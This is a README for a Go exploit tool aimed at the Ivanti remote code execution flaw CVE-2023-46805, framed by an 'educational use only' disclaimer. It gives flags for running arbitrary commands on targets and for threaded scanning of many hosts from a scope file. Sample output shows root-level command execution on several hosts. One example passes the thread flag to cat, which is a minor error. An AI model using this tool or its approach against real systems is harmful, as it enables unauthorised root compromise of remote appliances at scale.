Title: Proof of Concept for CVE-2023-46805 - For Educational Use Only

License: This work is placed under the Creative Commons Attribution 4.0 International License (CC BY 4.0). You are free to share, copy, distribute, and transmit this work, to adapt it or use it for other purposes, provided the authorship is appropriately attributed.

Disclaimer: This Proof of Concept (PoC) is provided for educational and cybersecurity research purposes only. Neither the author, the affiliated organization, nor any other party involved in the creation, production, or delivery of this content will be liable for any damages, including, but not limited to, direct, indirect, incidental, special, consequential, or punitive damages arising from the use or inability to use this content.

Educational Objective: This PoC is intended to aid the cybersecurity community in understanding and mitigating the vulnerability identified as CVE-2023-46805. It should not be used in a production environment or for malicious activities.

Vulnerability Description: Ivanti RCE

PoC Details:

Usage of ./CVE-Ivanti:
  -cmd string
        The command to replace 'id' in the payload (default "id")
  -t int
        Number of concurrent threads (default 5)

go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}

cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}

echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'